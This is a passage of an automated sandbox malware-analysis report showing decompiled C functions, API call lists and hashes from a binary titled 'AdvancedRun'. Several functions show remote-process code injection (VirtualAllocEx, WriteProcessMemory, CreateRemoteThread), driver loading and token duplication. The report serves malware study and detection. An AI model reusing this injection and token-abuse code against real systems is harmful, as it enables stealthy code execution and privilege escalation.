                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004095DA(signed int* __edi) {
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t3;
                                                                                                                				signed int* _t7;
                                                                                                                
                                                                                                                				_t7 = __edi;
                                                                                                                				_t3 =  *__edi;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					FreeLibrary(_t3); // executed
                                                                                                                					 *__edi =  *__edi & 0x00000000;
                                                                                                                				}
                                                                                                                				E004099D4( &(_t7[0xa]));
                                                                                                                				return E004099D4( &(_t7[6]));
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                
                                                                                                                				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                                                				return 1;
                                                                                                                			}



                                                                                                                0x0040a3d0
                                                                                                                0x0040a3d9

                                                                                                                APIs
                                                                                                                • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: EnumNamesResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 3334572018-0
                                                                                                                • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
                                                                                                                				void* _t1;
                                                                                                                				struct HINSTANCE__* _t2;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *0x41c4ac == 0) {
                                                                                                                					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                                                                					 *0x41c4ac = _t2;
                                                                                                                					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                                                                					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                                                                					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                                                                					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                                                                					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                                                                					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                                                                					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                                                                					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                                                                					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                                                                					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                                                                					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                                                                					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                                                                					 *0x41c4a8 = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                                                				char _v8;
                                                                                                                				long _v12;
                                                                                                                				long _v16;
                                                                                                                				long _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				long _v28;
                                                                                                                				char _v564;
                                                                                                                				char _v16950;
                                                                                                                				char _v33336;
                                                                                                                				_Unknown_base(*)()* _v33348;
                                                                                                                				_Unknown_base(*)()* _v33352;
                                                                                                                				void _v33420;
                                                                                                                				void _v33432;
                                                                                                                				void _v33436;
                                                                                                                				intOrPtr _v66756;
                                                                                                                				intOrPtr _v66760;
                                                                                                                				void _v66848;
                                                                                                                				void _v66852;
                                                                                                                				void* __edi;
                                                                                                                				void* _t76;
                                                                                                                				_Unknown_base(*)()* _t84;
                                                                                                                				_Unknown_base(*)()* _t87;
                                                                                                                				void* _t90;
                                                                                                                				signed int _t126;
                                                                                                                				struct HINSTANCE__* _t128;
                                                                                                                				intOrPtr* _t138;
                                                                                                                				void* _t140;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                
                                                                                                                				E0040B550(0x10524, __ecx);
                                                                                                                				_t138 = _a4;
                                                                                                                				_v12 = 0;
                                                                                                                				 *_t138 = 0;
                                                                                                                				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                                                				_a8 = _t76;
                                                                                                                				if(_t76 == 0) {
                                                                                                                					 *_t138 = GetLastError();
                                                                                                                					L30:
                                                                                                                					return _v12;
                                                                                                                				}
                                                                                                                				_v33436 = 0;
                                                                                                                				memset( &_v33432, 0, 0x8284);
                                                                                                                				_t148 = _t147 + 0xc;
                                                                                                                				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                				_v8 = 0;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("CreateProcessW");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t84 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t84 = _v8();
                                                                                                                				}
                                                                                                                				_v33352 = _t84;
                                                                                                                				E00409C70( &_v8);
                                                                                                                				_push("GetLastError");
                                                                                                                				_push(_t128);
                                                                                                                				if(_v8 == 0) {
                                                                                                                					_t87 = GetProcAddress();
                                                                                                                				} else {
                                                                                                                					_t87 = _v8();
                                                                                                                				}
                                                                                                                				_t140 = _a28;
                                                                                                                				_v33348 = _t87;
                                                                                                                				if(_t140 != 0) {
                                                                                                                					_t126 = 0x11;
                                                                                                                					memcpy( &_v33420, _t140, _t126 << 2);
                                                                                                                					_t148 = _t148 + 0xc;
                                                                                                                				}
                                                                                                                				_v33420 = 0x44;
                                                                                                                				if(_a16 == 0) {
                                                                                                                					_v33336 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v33336, _a16);
                                                                                                                				}
                                                                                                                				if(_a12 == 0) {
                                                                                                                					_v16950 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x2000,  &_v16950, _a12);
                                                                                                                				}
                                                                                                                				if(_a24 == 0) {
                                                                                                                					_v564 = 1;
                                                                                                                				} else {
                                                                                                                					E00404923(0x104,  &_v564, _a24);
                                                                                                                				}
                                                                                                                				_v24 = _a20;
                                                                                                                				_v28 = 0;
                                                                                                                				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                                                                				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                                                                				_a12 = _t90;
                                                                                                                				if(_a16 == 0 || _t90 == 0) {
                                                                                                                					 *_a4 = GetLastError();
                                                                                                                				} else {
                                                                                                                					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                                                                					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                                                                					_v20 = 0;
                                                                                                                					_v16 = 0;
                                                                                                                					_a24 = 0;
                                                                                                                					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                                                                					_a28 = _t144;
                                                                                                                					if(_t144 == 0) {
                                                                                                                						 *_a4 = GetLastError();
                                                                                                                					} else {
                                                                                                                						ResumeThread(_t144);
                                                                                                                						WaitForSingleObject(_t144, 0x7d0);
                                                                                                                						CloseHandle(_t144);
                                                                                                                					}
                                                                                                                					_v66852 = 0;
                                                                                                                					memset( &_v66848, 0, 0x8284);
                                                                                                                					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                                                                					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                                                                					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                                                                					if(_a28 != 0) {
                                                                                                                						 *_a4 = _v66756;
                                                                                                                						_v12 = _v66760;
                                                                                                                						if(_a32 != 0) {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_v20 != 0) {
                                                                                                                						FreeLibrary(_v20);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L30;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                • memset.MSVCRT ref: 0040A4B3
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                  • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                  • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                  • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
                                                                                                                				void* _t9;
                                                                                                                				struct HINSTANCE__* _t10;
                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                
                                                                                                                				if( *(__esi + 0x10) == 0) {
                                                                                                                					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                                					 *(__esi + 0x10) = _t10;
                                                                                                                					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                                					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                                					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                                					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                                					 *(__esi + 8) = _t14;
                                                                                                                					return _t14;
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                                				void* _v8;
                                                                                                                				char _v12;
                                                                                                                				char* _v20;
                                                                                                                				long _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char* _v36;
                                                                                                                				signed int _v40;
                                                                                                                				void _v44;
                                                                                                                				char _v48;
                                                                                                                				char _v52;
                                                                                                                				struct _OSVERSIONINFOW _v328;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t40;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t49;
                                                                                                                				struct HINSTANCE__** _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_t54 = __eax;
                                                                                                                				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                                				GetVersionExW( &_v328);
                                                                                                                				if(_v328.dwMajorVersion < 6) {
                                                                                                                					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                                				}
                                                                                                                				E0040A1EF(_t54);
                                                                                                                				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                				if(_t44 != 0) {
                                                                                                                					_t55 = 8;
                                                                                                                					memset( &_v44, 0, _t55 << 2);
                                                                                                                					_v12 = 0;
                                                                                                                					asm("stosd");
                                                                                                                					_v36 =  &_v12;
                                                                                                                					_v20 =  &_v52;
                                                                                                                					_v48 = 0x24;
                                                                                                                					_v44 = 0x10003;
                                                                                                                					_v40 = _t55;
                                                                                                                					_v28 = 0x10004;
                                                                                                                					_v24 = 4;
                                                                                                                					_a16 = 0;
                                                                                                                					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					return  !( ~_t40) & _a16;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}




















                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                				struct tagPOINT _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t47;
                                                                                                                				struct HBRUSH__* _t56;
                                                                                                                				void* _t61;
                                                                                                                				unsigned int _t63;
                                                                                                                				void* _t68;
                                                                                                                				struct HWND__* _t69;
                                                                                                                				struct HWND__* _t70;
                                                                                                                				void* _t73;
                                                                                                                				unsigned int _t74;
                                                                                                                				struct HWND__* _t76;
                                                                                                                				struct HWND__* _t77;
                                                                                                                				struct HWND__* _t78;
                                                                                                                				struct HWND__* _t79;
                                                                                                                				unsigned int _t85;
                                                                                                                				struct HWND__* _t87;
                                                                                                                				struct HWND__* _t89;
                                                                                                                				struct HWND__* _t90;
                                                                                                                				struct tagPOINT _t96;
                                                                                                                				struct tagPOINT _t98;
                                                                                                                				signed short _t103;
                                                                                                                				void* _t106;
                                                                                                                				void* _t117;
                                                                                                                
                                                                                                                				_t106 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t47 = _a4 - 0x110;
                                                                                                                				_t117 = __ecx;
                                                                                                                				if(_t47 == 0) {
                                                                                                                					__eflags =  *0x40feb0;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                                                                					} else {
                                                                                                                						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                					}
                                                                                                                					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                					E0040103E(_t117, __eflags);
                                                                                                                					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                                                                					goto L30;
                                                                                                                				} else {
                                                                                                                					_t61 = _t47 - 1;
                                                                                                                					if(_t61 == 0) {
                                                                                                                						_t103 = _a8;
                                                                                                                						_t63 = _t103 >> 0x10;
                                                                                                                						__eflags = _t103 - 1;
                                                                                                                						if(_t103 == 1) {
                                                                                                                							L24:
                                                                                                                							__eflags = _t63;
                                                                                                                							if(_t63 != 0) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                								DeleteObject( *(_t117 + 0x43c));
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eflags = _t103 - 2;
                                                                                                                							if(_t103 != 2) {
                                                                                                                								goto L30;
                                                                                                                							} else {
                                                                                                                								goto L24;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t68 = _t61 - 0x27;
                                                                                                                						if(_t68 == 0) {
                                                                                                                							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                							__eflags = _a12 - _t69;
                                                                                                                							if(_a12 != _t69) {
                                                                                                                								__eflags =  *0x40ff30;
                                                                                                                								if( *0x40ff30 == 0) {
                                                                                                                									goto L30;
                                                                                                                								} else {
                                                                                                                									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                									__eflags = _a12 - _t70;
                                                                                                                									if(_a12 != _t70) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										goto L18;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								L18:
                                                                                                                								SetBkMode(_a8, 1);
                                                                                                                								SetTextColor(_a8, 0xc00000);
                                                                                                                								_t56 = GetSysColorBrush(0xf);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t73 = _t68 - 0xc8;
                                                                                                                							if(_t73 == 0) {
                                                                                                                								_t74 = _a12;
                                                                                                                								_t96 = _t74 & 0x0000ffff;
                                                                                                                								_v12.x = _t96;
                                                                                                                								_v12.y = _t74 >> 0x10;
                                                                                                                								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                								_push(_v12.y);
                                                                                                                								_a8 = _t76;
                                                                                                                								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                								__eflags = _t77 - _a8;
                                                                                                                								if(_t77 != _a8) {
                                                                                                                									__eflags =  *0x40ff30;
                                                                                                                									if( *0x40ff30 == 0) {
                                                                                                                										goto L30;
                                                                                                                									} else {
                                                                                                                										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                										_push(_v12.y);
                                                                                                                										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                										__eflags = _t79 - _t78;
                                                                                                                										if(_t79 != _t78) {
                                                                                                                											goto L30;
                                                                                                                										} else {
                                                                                                                											goto L13;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L13:
                                                                                                                									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                									goto L8;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t73 != 0) {
                                                                                                                									L30:
                                                                                                                									_t56 = 0;
                                                                                                                									__eflags = 0;
